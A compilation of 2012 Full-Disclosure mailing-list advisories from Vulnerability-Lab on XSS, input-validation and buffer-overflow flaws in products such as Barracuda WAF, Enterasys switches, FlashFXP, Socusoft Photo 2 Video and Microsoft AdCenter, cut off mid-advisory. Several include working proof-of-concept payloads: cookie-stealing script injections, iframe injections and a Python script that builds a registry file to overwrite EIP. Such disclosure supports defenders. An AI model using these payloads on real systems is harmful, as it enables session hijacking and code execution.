[Full-disclosure] Barracuda WAF 660 v7.6.0.028 - Cross Site Vulnerability
Title: == Barracuda WAF 660 v7.6.0.028 - Cross Site Vulnerability Date: = 2012-03-07 References: === http://www.vulnerability-lab.com/get_content.php?id=444 VL-ID: = 444 Introduction: = The Barracuda Web Application Firewall provides superior protection against hackers’ attempts to exploit vulnerabilities in Web sites or Web applications to steal data, cause denial of service or deface Web sites. By integrating application delivery capabilities, the Barracuda Web Application Firewall is an affordable and comprehensive application firewall that can secure Web applications, as well as increase their performance and availability. - Protection against common attacks - Outbound data theft protection - Web site cloaking - Granular policies - Secure HTTP traffic - SSL Offloading - SSL Acceleration - Load Balancing The Barracuda Web Application Firewall is a complete and powerful security solution for Web applications and Web sites. The Barracuda Web Application Firewall provides award-winning protection against hackers leveraging protocol or application vulnerabilities to instigate data theft, denial of service or defacement of your Web site. (Copy of the vendor Homepage: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php ) Abstract: = Vulnerability-Lab Team discovered a non persistent Cross Site Scripting Vulnerability on Barracudas Web Application Firewall 660 v7.6.0.028. Report-Timeline: 2012-02-16: Vendor Notification 2012-02-19: Vendor Response/Feedback 2012-03-05: Vendor Fix/Patch 2012-03-07: Public or Non-Public Disclosure Status: Published Affected Products: == Barracuda Networks Product: Barracuda Web Application Firewall 660 v7.6.0.028 Exploitation-Technique: === Remote Severity: = Low Details: A client side cross site scripting vulnerability is detected on Barracudas Web Application Firewall 660 v7.6.0.028. The vulnerability allows an attacker (remote) to hijack customer/moderator/admin sessions with medium required user inter action. Successful exploitation can result in account steal or client side context manipulation when processing firewall module application requests. Vulnerable Module(s): [+] sessions_by_userfilter=[x] Picture(s): ../1.png ../2.png Risk: = The security risk of the non-persistent (client side) cross site scripting vulnerability is estimated as low(+). Credits: Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Enterasys SecureStack Switch v6.x - Multiple Vulnerabilities
Title: == Enterasys SecureStack Switch v6.x - Multiple Vulnerabilities Date: = 2012-03-08 References: === http://www.vulnerability-lab.com/get_content.php?id=443 VL-ID: = 443 Introduction: = The Enterasys C5 is a scalable, high-performance Gigabit Ethernet switch offering support for IEEE 802.3at compliant high-power PoE, flexible 10 Gigabit Ethernet options, dynamic IPv4 and IPv6 routing and enhanced automation capabilities to provide for a future-proofed solution that significantly reduces operational expenses for customers. Along with a switch capacity of 264 Gbps, the C5 provides up to 48 10/100/1000 Ethernet ports as well as two SFP+ ports, with the ability to support both 1GE and 10GE uplinks on the same port. Leveraging the C5’s stacking capability, as many as 8 C5s (both 24-port and 48-port combinations) can be interconnected in a single stack to create a virtual switch that provides 2.11 Tbps of capacity and up to 384 10/100/1000 Ethernet ports as well as 16 10GE uplink ports. All C-Series products include a comprehensive lifetime warranty that includes services for which many competitors charge additional fees. Included benefits, such as advanced hardware return, firmware feature upgrades (which most vendors cover at most for 90 days) and telephone support (which most don’t include or severely limit) combine to significantly decrease operational costs for organizations – equaling savings of up to $1 million in service contract fees over the life of a customer’s network. (Copy of the Vendor Homepage: http://www.enterasys.com/products/security-enabled-infrastructure/securestack-cseries.aspx ) Abstract: = A Vulnerability Laboratory Researcher discovered multiple Web Vulnerabilities on Enterasys SecureStack Switch v6.x. Report-Timeline: 2012-02-16: Vendor Notification 2012-**-**: Vendor Response/Feedback 2012-**-**: Vendor Fix/Patch 2012-03-08: Public or Non-Public Disclosure Status: Published Affected Products: == Enterasys Product: SecureStack Switch v6.x Exploitation-Technique: === Remote Severity: = High Details: Multiple persistent Input Validation vulnerabilities are detected on Enterasys SecureStack Switches Series A - C. Local low privileged user accounts can implement/inject malicious script code to manipulate modules via persistent context requests. When exploited by an authenticated user, the identified vulnerabilities can result in information disclosure via error, session hijacking, access to available appliance services, manipulated persistent content execution out of the application context. Vulnerable Module(s): [+] System Name [+] System Location [+] System Contact [+] VLAN Name Affected Model(s): [+] B2G124-24 - Firmware: 04.02.08.0006 [+] B2G124-48 - Firmware: 04.02.08.0006 [+] B3G124-48 - Firmware: 04.02.08.0006 [+] B5G124-24 - Firmware: 06.41.02.0007 [+] B5G124-48 - Firmware: 06.41.05.0001, 06.41.06.0002, 06.42.08.0007 [+] C3G124-24P - Firmware: 06.03.08.0012, 06.42.10.0016 (latest) [+] C3G124-48 - Firmware: 06.03.04.0004 [+] C3G124-48P - Firmware: 06.03.08.0012 Picture(s): ../1.png ../2.png ../3.png ../4.png ../5.png ../6.png Proof of Concept: = The vulnerabilities can be exploited by remote attackers with low required user inter action. For demonstration or reproduce ... Exploitation via Console: Command#1: set vlan name 1337 scriptalert(document.cookie)/script Command#2: set system name iframe src=http://www.vulnerability-lab.com Command#3: set system location iframe src=a onload=alert(VL) Command#4: set system contact scriptalert('VL')/script Note: To exploit the bug via webinterface, see pictures section. Risk: = The security risk of the persistent Input Validation Vulnerabilities is estimated as high(-). Credits: Vulnerability Laboratory Researcher - Julien Ahrens (MrTuxracer) [www.inshell.net] Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and
[Full-disclosure] Pitrinec MacroToolworks 7.5 - Buffer Overflow Vulnerability
Title: == Pitrinec MacroToolworks 7.5 - Buffer Overflow Vulnerability Date: = 2012-03-08 References: === http://www.vulnerability-lab.com/get_content.php?id=466 VL-ID: = 466 Introduction: = Macro Toolworks is powerful all-in-one Windows automation macro software. It allows user to record macros, visually edit macros and playback macros in any Windows application. Each macro can be triggered multiple ways depending on the user s needs: by keyboard shortcuts, mouse clicks or other events, macro scheduler, hotkey, toolbars, etc. Macros recorded in macro recorder (both keyboard recorder and mouse recorder) can be manually edited and optimized. Macros can simply mimic user by sending Windows keys and mouse clicks or they can do even more complex repetitive daily tasks such as file backups and other file manipulation, fill web forms, e-mail writing, chatting, inserting data to database forms, files downloading/uploading, file and directory zipping and encryption and more ... (Copy of the Vendor Homepage: http://www.pitrinec.com/toolsworks_de.htm ) Abstract: = A Vulnerability Laboratory Researcher discovered a Local Buffer Overflow vulnerability on Pitrinec Software Macro Toolworks Free/Standard/Pro v7.5.0. Report-Timeline: 2012-03-08: Public or Non-Public Disclosure Status: Published Affected Products: == Pitrinec Software Product: Macro Toolworks Framework Free, Pro Standard v7.5.0 Exploitation-Technique: === Local Severity: = High Details: A Buffer Overflow vulnerability is detected on Pitrinecs Software Macro Toolworks Free/Standard/Pro v7.5.0 Edition (current version). The vulnerability is located in the main executeable _prog.exe, which gets invoked e.g. by the _loader.exe or by StartMacroToolworks.exe. When launching the _prog.exe or one executeable which invokes the _prog.exe, it automatically reads the contents of the options.ini from the application directory. It reads the [last] section string to determine which files have been opened at last by the user. The application does validate the string length of the [last] section before passing the content to a buffer, which could lead to a local buffer overflow. --- Debugger --- # 646D36: The instruction at 0x646D36 referenced memory at 0x42424242. The memory could not be read - 42424242 (exc.code c005, tid 3128) # Registers: # EAX 0120EA00 Stack[04C8]:0120EA00 # EBX # ECX 42424242 # EDX 0002 # ESI 007F6348 _prog.exe:007F6348 # EDI 007F6348 _prog.exe:007F6348 # EBP 0120EA0C Stack[04C8]:0120EA0C # ESP 0120E9E8 Stack[04C8]:0120E9E8 # EIP 00646D36 _prog.exe:00646D36 # EFL 00200206 # Stack: # 0120E9E0 0012DF3C # 0120E9E4 # 0120E9E8 0205A5A0 debug045:0205A5A0 # 0120E9EC 1B879EF8 # 0120E9F0 007F6348 _prog.exe:007F6348 # 0120E9F4 007F6348 _prog.exe:007F6348 # Crash: # _prog.exe:00646D36 ; --- # _prog.exe:00646D36 mov eax, [ecx] # _prog.exe:00646D38 calldword ptr [eax+0Ch] # _prog.exe:00646D3B callnear ptr unk_6750D0 # _prog.exe:00646D40 retn4 # _prog.exe:00646D40 ; --- # Dump: # 007F6380 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 # 007F6390 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 # 007F63A0 42 42 42 42 43 43 43 43 43 43 43 43 43 43 43 43 # 007F63B0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 # 007F63C0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 Note: Affected are all other products provided by Pitrinec Software which use the _prog.exe too. Picture(s): ../1.png Proof of Concept: = The buffer overflow vulnerability can be exploited by local attackers without user inter action. For demonstration or reproduce ... #!/usr/bin/python # Exploit Title: Pitrinec Software Macro Toolworks Free/Standard/Pro v7.5.0 Local Buffer Overflow # Version: 7.5.0 # Date: 2012-03-04 # Author:Julien Ahrens # Homepage: http://www.inshell.net # Software Link: http://www.macrotoolworks.com # Tested on: Windows XP SP3 Professional German / Windows 7 SP1 Home Premium German # Notes: Overflow occurs in _prog.exe, vulnerable are all Pitrinec applications on the same way. # Howto: Copy options.ini to App-Dir -- Launch # 646D36: The instruction at 0x646D36 referenced memory at 0x42424242. The memory could not be read - 42424242 (exc.code c005, tid 3128) # Registers: # EAX 0120EA00 Stack[04C8]:0120EA00 # EBX # ECX 42424242 # EDX 0002 # ESI 007F6348 _prog.exe:007F6348 # EDI 007F6348 _prog.exe:007F6348 # EBP 0120EA0C
[Full-disclosure] HITB2011KUL - Satellite Telephony Security - Jim Geovedi
Title: == HITB2011KUL - Satellite Telephony Security - Jim Geovedi Date: = 2012-03-07 References: === Download: http://www.vulnerability-lab.com/resources/videos/464.wmv View: http://www.youtube.com/watch?v=23FKGifzCJs VL-ID: = 464 Status: Published Exploitation-Technique: === Conference Severity: = High Details: This talk will provide an in-depth treatment of satellite telephony networks from a security perspective. The overall system seems secure, but in reality, it cannot be expected to be fully reliable. We will briefly cover the satellite mobile system architecture, then discuss GMR (GEO-Mobile Radio) system elements, e.g. GSS (Gateway Station Subsystem), MES (Mobile Earth Station), AOC (Advanced Operation Center), and TCS (Traffic Control Subsystem) for GMR-1 systems and NCC (Network Control Center), GW (Gateway), SCF (Satellite Control Facility) and CMIS (Customer Management Information System) for GMR-2 systems. From there, we will discuss the security issues of GMR system as it shares similar vulnerabilities with GSM–GMR is derived from the terrestrial digital cellular standard GSM and support access to GSM core networks, along with some interesting demos. Time permitting, a question and answer session at the end of the presentation will allow participants to cover any additional issues in satellite telephony system they’d like to discuss. Credits: Jim Geovedi - (Independent Security Researcher) Note: BBC News described Jim as a guy who “doesn’t look like a Bond villain… but possesses secrets that some of them might kill for”. Disclaimer: === The information provided in this video is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FlashFXP v4.1.8.1701 - Buffer Overflow Vulnerability
Title: == FlashFXP v4.1.8.1701 - Buffer Overflow Vulnerability Date: = 2012-03-01 References: === http://www.vulnerability-lab.com/get_content.php?id=462 VL-ID: = 462 Introduction: = FlashFXP is a FTP (File Transfer Protocol) client for Windows, it offers you easy and fast ways to transfer any file between other local computers (LAN - Local Area Network) running a FTP server or via the Internet (WAN - Wide Area Network) and even directly between two servers using Site to Site transfers (FXP - File eXchange Protocol). Use FlashFXP to publish and maintain your website, Upload and download documents, photos, videos, music and more! Share your files with your friends and co-workers using the powerful site manager. There are many features and advanced options available within FlashFXP which are being added with the release of each new version stable or beta*. The software is available in over 20 languages and under active development. FlashFXP offers high security, performance, and reliability that you can always depend on to get your job done swiftly and efficiently. (Copy of the Vendor Homepage: http://www.flashfxp.com) Abstract: = The Vulnerability Laboratory Research Team discovered a Buffer Overflow Vulnerability on FlashFXP v4.1.8.1701. Report-Timeline: 2012-02-27: Vendor Notification 2012-02-28: Vendor Response/Feedback 2012-03-01: Public or Non-Public Disclosure Status: Published Affected Products: == OpenSight Software Product: FlashFXP Software Client v4.1.8.1701 Exploitation-Technique: === Local Severity: = High Details: A Buffer Overflow Vulnerability is detected on FlashFXPs Software Client v4.1.8.1701. The vulnerability is located when processing to force a ListIndex Out of Bound(s) exception which allows to overwrite ecx eip of the affected software process. Successful exploitation can result in process compromise, execution of arbitrary code, system compromise or escaltions with privileges of affected vulnerable software process. The flaw is a direct result of a fixed length buffer being used in the TListBox control and the lack of range checking. The code assumes that the string returned by the listbox control will be less than 4097 characters. It uses a fixed size buffer of 4096 bytes and any text longer than this will overflow and overwrite the memory beyond it. The TComboBox control also suffers a similar flaw. Vulnerable Module(s): [+] List Index Exception Handling [TListBox] Picture(s): ../1.png ../2.png ../3.png ../4.png ../5.png Proof of Concept: = The vulnerability can be exploited by local remote attackers. For demonstration or reproduce ... Manually reproduce ... 1. Download open the software client 2. Connect to a random server for inter action 3. Enable the Option Settings = Filters = Skip-List 3. Open the Option = Filter Settings 4. Add a new (Skip-List)one by Including a large unicode string wait for the exception-handling 5. The exception-handling out of bounds comes up 6. You pass it 2 times by clicking continue ... 7. The software is now crashing with a stable bex exception displays input as offset[6] 8. Now you can overwrite the ecx eip of the affected vulnerable software process to exploit the client system Note: To exploit the bug (remote) an attacker needs to know the included filters of the connected client to send large strings. --- Exception Error #1 --- date/time : 2012-02-28, 16:38:58, 531ms computer name : HOSTBUSTER user name : Rem0ve operating system : Windows 7 Tablet PC x64 Service Pack 1 build 7601 system language : German system up time: 5 days 13 hours program up time : 7 minutes 2 seconds processors: 2x Intel(R) Core(TM)2 Duo CPU T6600 @ 2.20GHz physical memory : 2243/4091 MB (free/total) free disk space : (C:) 207,54 GB display mode : 1366x768, 32 bit process id: $16fc allocated memory : 50,75 MB executable: FlashFXP.exe exec. date/time : 2012-01-15 22:45 executable hash : 34A53BD60479975EA6DAAB55B8D878B4 version : 4.1.8.1701 ANSI code page: 1252 callstack crc : $1083d124, $c40af1d7, $90cfaf70 exception number : 1 exception class : EStringListError exception message : List index out of bounds (0). --- Exception Error #2 --- date/time : 2012-02-28, 16:39:57, 530ms computer name : HOSTBUSTER user name : Rem0ve operating system : Windows 7 Tablet PC x64 Service Pack 1 build 7601 system language : German system up time: 5 days 13 hours program up
[Full-disclosure] LDAP Account Manager Pro v3.6 (lamp) - Multiple Vulnerabilities
Title: == LDAP Account Manager Pro v3.6 - Multiple Vulnerabilities Date: = 2012-03-01 References: === http://www.vulnerability-lab.com/get_content.php?id=458 VL-ID: = 458 Introduction: = LDAP Account Manager Pro is an extended version of LAM which focuses on enterprise usage. It helps you to lower your administration costs by providing enhanced tools for your users and deskside support staff. Features LDAP Account Manager (LAM) is a webfrontend for managing entries (e.g. users, groups, DHCP settings) stored in an LDAP directory. LAM was designed to make LDAP management as easy as possible for the user. It abstracts from the technical details of LDAP and allows persons without technical background to manage LDAP entries. If needed, power users may still directly edit LDAP entries via the integrated LDAP browser. (Copy of the Vendor Homepage: http://www.ldap-account-manager.org/lamcms/lamPro ) Abstract: = Vulnerability-Lab Team discovered multiple web vulnerabilities on LDAPs Account Manager Pro v3.6. Report-Timeline: 2012-02-22: Public or Non-Public Disclosure Status: Published Affected Products: == Open Source Product: LDAP Account Manager Pro (lamp) v3.6 Exploitation-Technique: === Remote Severity: = Medium Details: 1.1 Multiple persistant input validation vulnerabilities are detected on LDAPs Account Manager Pro v3.6. The bug allows remote attacker to implement malicious script code on the application side (persistent). Successful exploitation of the vulnerability allows an attacker to manipulate modules/context (persistent) can lead to session hijacking (user/mod/admin). Vulnerable Module(s): [+] User Listing List Input/Output [+] Export Picture(s): ../1.png ../2.png 1.2 Multiple client-side Cross Site Scripting vulnerabilities are detected on LDAPs Account Manager Pro v3.6. The bug allows remote attacker hijack customer/admin sessions with medium required user inter action. Successful exploitation leads to session hijacking or client side module manipulation attacks and the result is account steal. Vulnerable Module(s): [+] attr= [+] Filter- Search Listing Picture(s): ../3.png ../4.png Proof of Concept: = The vulnerabilities can be exploited by remote attacker with low high required user inter action. For demonstration or reproduce ... 1.1 Code Review: Exception handling of User Input Listing div class=statusError ui-corner-all table tbodytr td img src=list.php-filter-Dateien/error.png alt=ERROR height=32 width=32/td tdh2 class=statusError ui-corner-allPlease enter a valid filter. Only letters, numbers and _*$.@- are allowed./h2p class=statusError ui-corner-all-1'[INJECTED PERSISTENT SCRIPT CODE!] /p/td /tr /tbody/table ... or Code Review: Export Function - Persistent Error Output File # Suchbereich: base # Suchfilter: iframe src=http://google.com # Anzahl Einträge: 0 # Generated by LDAP Account Manager (http://phpldapadmin.sourceforge.net) on February 22, 2012 4:51 pm # Version: 3.6 version: 1 Reference(s): ../export-import-p0c.ldif ../list.php-filter.htm 1.2 http://www.ldap-account-manager.org/lam/templates/3rdParty/pla/htdocs/cmd.php?cmd=add_value_form; server_id=1dn=uid%3Dpc01%24%2Cou%3Dmachines%2Cdc%3Dlam-demo%2Cdc%3Dorgattr=%3E%22%3Ciframe %20src=http://www.vulnerability-lab.com%20width=1200%20height=800%3E Reference(s): ../cmd.php-attr.htm ../attr=.txt Risk: = The security risk of the persistent web vulnerabilities are estimated as medium(+). Credits: Vulnerability Research Laboratory -Benjamin Kunz Mejri Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-
[Full-disclosure] Microsoft AdCenter Service - Cross Site Vulnerabilities
Title: == Microsoft AdCenter Service - Cross Site Vulnerabilities Date: = 2012-02-27 References: === http://www.vulnerability-lab.com/get_content.php?id=447 MSRC ID: 12223 VL-ID: = 447 Introduction: = Microsoft adCenter (formerly MSN adCenter), is the division of the Microsoft Network (MSN) responsible for MSN s advertising services. Microsoft adCenter provides pay per click advertisements. This is a service aimed at people who want to advertise a product. Microsoft also has a (still in beta) service for webmasters who want to monetize on their site: Microsoft pubCenter. Search and display advertising solutions for small businesses and large advertisers and agencies on Bing and Yahoo! Search, MSN, Windows Live, Xbox Co. (Copy of the Vendor Website: http://advertising.microsoft.com/home) Abstract: = The Vulnerability-Lab Team discovered multiple non-persistent cross site scripting vulnerabilities on Microsofts AdCenter website application. Report-Timeline: 2012-02-18: Vendor Notification 2012-02-19: Vendor Response/Feedback 2012-02-26: Vendor Fix/Patch 2012-02-27: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Low Details: A non persistent cross site scripting vulnerability is detected on on Microsofts AdCenter website application. The vulnerability allows an remote attacker with required user inter action to hijack customer sessions via cross site scripting. Successful exploitation can result in account steal, client side phishing or session hijacking. Vulnerbale Module(s): [+] austra123; media brands; tv Picture(s): ../1.png ../2.png ../3.png Proof of Concept: = The vulnerabilites can be exploited by remote attackers with high required user inter action. For demonstration or reproduce ... advertising.microsoft.com/austra123%27;alert%28document.cookie%29;a=%27 advertising.microsoft.com/media-brands';alert(document.cookie);a=' advertising.microsoft.com/tv';alert(document.cookie);a=' Reference(s): advertising.microsoft.com/austra123 advertising.microsoft.com/media-brands advertising.microsoft.com/tv Risk: = The security risk of the non persistent cross site scripting vulnerabilities are estimated as low(+). Credits: Vulnerability Research Laboratory - Ucha Gobejishvili (longrifle0x) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Socusoft Photo 2 Video v8.05 - Buffer Overflow Vulnerability
Title: == Socusoft Photo 2 Video v8.05 - Buffer Overflow Vulnerability Date: = 2012-02-27 References: === http://www.vulnerability-lab.com/get_content.php?id=460 VL-ID: = 460 Introduction: = Socusoft photo to video converter Professional allows you to create all kinds of eye-catching slideshow videos (mp4, flv, mov, avi, mkv, mpeg, h.264, h.264 HD, 3gp, 3gpp2, swf ) playable on YouTube, Facebook, MySpace, iPod, iPad, iphone, Archos, PSP, Zune. With the powerful Photo to Video Converter Professional,you could convert photo to the animating and dynamic video and share the video on YouTube, Facebook, MySpace, iPod, iPad, iPhone. With just a few minutes of work, you\\\'ll have an eye-catching slideshow video with background music and dynamic panzoom and attractive transition effects. This powerful Photo to Video Converter Professional supports Over 260 animating transition effects with Pan Zoom effect. (Copy of the Vendor Homepage: ) Abstract: = A Vulnerability Laboratory Researcher discovered a Local Buffer Overflow vulnerability on Socusofts Photo to Video Converter Free and Professional v8.05 Report-Timeline: 2012-02-27: Public or Non-Public Disclosure Status: Published Affected Products: == Socusoft Photo 2 Video v8.05 Exploitation-Technique: === Local Severity: = High Details: A Buffer Overflow vulnerability is detected on Socusoft Photo to Video Converter Free and Professional v8.05 (current version). The vulnerability is located in the pdmlog.dll. Successful exploitation can result in execution of code, overwrite of registers system compromise. Vulnerable DLL(s): [+] pdmlog.dll --- Registers --- # EAX 42424242 # EBX 0036 pdmlog.dll:0036 # ECX 0036BF3B pdmlog.dll:pdmlog_5+A66B # EDX 80284006 # ESI 0002 # EDI # EBP 01C5FC0C Stack[01AC]:01C5FC0C # ESP 01C5FBF0 Stack[01AC]:01C5FBF0 # EIP 42424242 # EFL 00010206 --- Stack --- # 01C5FBE0 # 01C5FBE4 0002 # 01C5FBE8 94B7 # 01C5FBEC 0001 # 01C5FBF0 0036BF6F pdmlog.dll:pdmlog_5+A69F - Crash # 01C5FBF4 0036 pdmlog.dll:0036 # 01C5FBF8 0002 # 01C5FBFC # 01C5FC00 # 01C5FC04 01C5FC20 Stack[01AC]:01C5FC20 # 01C5FC08 7FFDE000 debug066:7FFDE000 --- Dump --- # 00370584 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 # 00370594 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 # 003705A4 42 42 42 42 43 43 43 43 43 43 43 43 43 43 43 43 # 003705B4 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 # 003705C4 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 Picture(s): ../1.png Proof of Concept: = The Vulnerability can be exploited by local attackers. For demonstration or reproduce ... #!/usr/bin/python # Exploit Title: Socusoft Photo to Video Converter Free/Pro v8.05 (pdmlog.dll) Local Buffer Overflow PoC # Version: 8.05 # Date: 2012-02-26 # Author:Julien Ahrens # Homepage: http://www.inshell.net # Software Link: http://www.socusoft.com # Tested on: Windows XP SP3 Professional German # Notes: Overflow occurs in pdmlog.dll # Howto: Import Reg - Start App # EAX 42424242 # EBX 0036 pdmlog.dll:0036 # ECX 0036BF3B pdmlog.dll:pdmlog_5+A66B # EDX 80284006 # ESI 0002 # EDI # EBP 01C5FC0C Stack[01AC]:01C5FC0C # ESP 01C5FBF0 Stack[01AC]:01C5FBF0 # EIP 42424242 # EFL 00010206 # 01C5FBE0 # 01C5FBE4 0002 # 01C5FBE8 94B7 # 01C5FBEC 0001 # 01C5FBF0 0036BF6F pdmlog.dll:pdmlog_5+A69F - Crash # 01C5FBF4 0036 pdmlog.dll:0036 # 01C5FBF8 0002 # 01C5FBFC # 01C5FC00 # 01C5FC04 01C5FC20 Stack[01AC]:01C5FC20 # 01C5FC08 7FFDE000 debug066:7FFDE000 file=poc.reg junk1=\x41 * 548 boom=\x42\x42\x42\x42 junk2=\x43 * 100 poc=Windows Registry Editor Version 5.00\n\n poc=poc + [HKEY_CURRENT_USER\Software\Socusoft Photo to Video Converter Free Version\General]\n poc=poc + \TempFolder\=\ + junk1 + boom + junk2 + \ try: print [*] Creating exploit file...\n; writeFile = open (file, w) writeFile.write( poc ) writeFile.close() print [*] File successfully created!; except: print [!] Error while creating file!; Risk: = The security risk of the local buffer overflow vulnerability is estimated as high(-). Credits: Vulnerability Research Laboratory - Julien Ahrens (MrTuxracer) [www.inshell.net] Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability
[Full-disclosure] OSQA CMS v3b - Multiple Persistent Vulnerabilities
Title: == OSQA CMS v3b - Multiple Web Vulnerabilities Date: = 2012-02-27 References: === http://www.vulnerability-lab.com/get_content.php?id=461 VL-ID: = 461 Introduction: = OSQA is the Open Source QA System. It is free software licensed under the GPL, and you can download the source code for OSQA from our Subversion server. OSQA is originally based on CNProg, an excellent Chinese QA web application written by Mike Chen and Sailing Cai. OSQA is written in Python and powered by the Django application framework. Abstract: = The Vulnerability Lab Research Team discovered multiple persistent Input Validation Vulnerabilities on OSQAs CMS v3b. Report-Timeline: 2012-02-27: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistent cross site scripting vulnerabilities are detected on OSQAs CMS v3b. The vulnerability allows remote attackers to hijack customer, moderator or admin sessions with high required user inter action or local low privileged user account medium required user inter action. Successful exploitation can result in account steal, phishing application-side content request manipulation. Vulnerable Module(s): [+] Url Bar [+] Picture Bar [+] Blockquote Proof of Concept: = The vulnerabilities can be exploited by local low privileged user accounts or remote attackers with high required user inter action. For demonstration or reproduce ... XSS #1 http://localhost/questions/ask/ press url bar put xss code img src=img src=search/onerror=alert(xss)// XSS #2 http://localhost/questions/ask/ press picture bar put xss code img src=img src=search/onerror=alert(xss)// Risk: = The security risk of the cross site scripting vulnerabilities are estimated as medium(-). Credits: Vulnerability Research Laboratory - Ucha Gobejishvili ( longrifle0x ) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Wolf CMS v0.7.5 - Multiple Web Vulnerabilities
Title: == Wolf CMS v0.7.5 - Multiple Web Vulnerabilities Date: = 2012-02-27 References: === http://www.vulnerability-lab.com/get_content.php?id=452 VL-ID: = 452 Introduction: = Wolf CMS is a content management system and is Free Software published under the GNU General Public License v3. Wolf CMS is written in the PHP programming language. Wolf CMS is a fork of Frog CMS. The project was a finalistin the 2010 Packt Publishing s Open Source awards for the Most Promising Open Source Project category. As of the 28th of December 2010, the Wolf CMS code repository was moved from Google Code to Github. ( Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Wolf_CMS ) Abstract: = Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities on the Wolf Content Management System v0.7.5 Report-Timeline: 2012-02-11: Vendor Notification 2012-02-27: Public or Non-Public Disclosure Status: Published Affected Products: == BlueWin CH Product: Wolf CMS v0.7.5 Exploitation-Technique: === Remote Severity: = High Details: 1.1 A SQL Injection vulnerability is detected on the Wolfs Content Management System v0.7.5. The vulnerability allows an remote attacker to execute own sql commands on the affected application dbms. Successful exploitation can result in dbms, web-server or application compromise. Vulnerable Module(s): [+] /plugins/comment/[Index] Picture(s): ../1.png 1.2 Multiple persistent vulnerabilities are detected on the Wolfs Content Management System v0.7.5. The bug allows an 